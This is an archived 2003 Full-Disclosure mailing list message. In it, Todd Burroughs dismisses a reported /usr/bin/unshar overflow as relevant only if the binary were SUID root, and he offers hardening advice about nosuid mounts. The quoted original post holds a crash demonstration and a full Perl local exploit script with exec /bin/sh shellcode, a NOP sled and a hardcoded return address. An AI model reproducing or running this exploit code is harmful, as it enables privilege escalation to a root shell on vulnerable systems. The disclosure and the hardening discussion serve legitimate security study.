lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <Pine.LNX.4.58.0312040220020.7596@suse.bluegenesis.com>
From: todd at hostopia.com (Todd Burroughs)
Subject: flames security group start to play , yet
 another vuln found (rustymemory and welshboi)

This has to be a troll, I mean if I made /bin/sh SUID root and gave you
a shell, you could probably get root on my system.

You shouldn't have much on your system that is SUID root.  I have no
idea why someone would even think that unshar would be set this way.
If you use SuSE, set security to "paranoid" and it does a decent job,
after that you will need to add whatever you need to the security.local
file. depending on what you use the system for.

I know I'm biting on this, but it does underscore the fact that you should
"unsuid" anything that is not really needed on your system.

I make a small partition and mount everything else "nosuid".  I put
anything that needs suid or sgid on that filesystem and make symlinks
to where it should be.  This makes is easy to find SUID programs,
run mount and make sure things are mounted nosuid, then look at your
"suid partition".

Todd Burroughs

---
The Internet has given us unprecedented opportunity to communicate and
share on a global scale without borders; fight to keep it that way.

On Wed, 3 Dec 2003, KF wrote:

> if you are bored .... download unrar.
> -KF
>
>
> rustymemory wrote:
>
> >By: flames.bluefox.net.nz
> >if unshar suid; then you w00t
> >
> >proof of concept?
> >
> >rustymemory@...mes:~$ unshar -f `perl -e 'print"A"x2000'`
> >............................AAAAAAAAAAAAAASegmentation fault
> >
> >welshboi@...mes:~$ more unshar.pl
> >#!/usr/bin/perl
> >#/usr/bin/unshar local sploit.
> >#coded by welshboi (deadbeat)
> >#found by rustymemory
> >#
> >#FLAMES SECURITY GROUP
> >#Private, please dont distribute
> >#affects all linux distributions , tested on slackware 9.1 and MDK
> >###############################################
> >#[deadbeat@...achu sploits]$ perl unshar.pl #
> ># #
> >#[] /usr/bin/unshar exploit #
> >#[] coded by: deadbeat [] #
> >#[] found by: rustymemory [] #
> >#_f1GWugHu[SPZ #
> ># #
> >#sh-2.05b$ #
> >###############################################
> ># 47byte shellcode (exec /bin/sh)
> >$hell = "\xeb\x1f\x5f\x89\xfc\x66\xf7\xd4\x31\xc0\x8a\x07".
> >"\x47\x57\xae\x75\xfd\x88\x67\xff\x48\x75\xf6\x5b".
> >"\x53\x50\x5a\x89\xe1\xb0\x0b\xcd\x80\xe8\xdc\xff".
> >"\xff\xff\x01\x2f\x62\x69\x6e\x2f\x73\x68\x01";
> >$egg = 2000;
> >$buf = 1128;
> >$nop = "\x90";
> >$offset = 0;
> >$ret =0x40055bdc;
> >if(@ARGV == 1) {$offset = $ARGV[0];}
> >$addr = pack('l', ($ret + $offset));
> >for($i = 0; $i<$buf; $i += 4){$evil .=$addr;}
> >for($i = 0; $i<($egg - length($hell) -100); $i++){$evil .=$nop;}
> >$evil .= $hell;
> >print "\n[] /usr/bin/unshar exploit []\n";
> >print "[] coded by: deadbeat, uk2sec []\n";
> >print "[] found by: rustymemory []\n\n";
> >print ("[]trying addr: 0x", sprintf('%lx',($ret + $offset)),"\n");
> >system("/usr/bin/unshar -f $evil");
> >
> >---------------------------------------------------------
> >shouts to ?
> >
> >calidan(daddeh) , linucks ( wifi whore) , h0stile (the maniac) , and the rest
> >of flames security group. and rusty's fiancee
> >
> >_______________________________________________
> >Full-Disclosure - We believe in it.
> >Charter: http://lists.netsys.com/full-disclosure-charter.html
> >
> >
> >
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ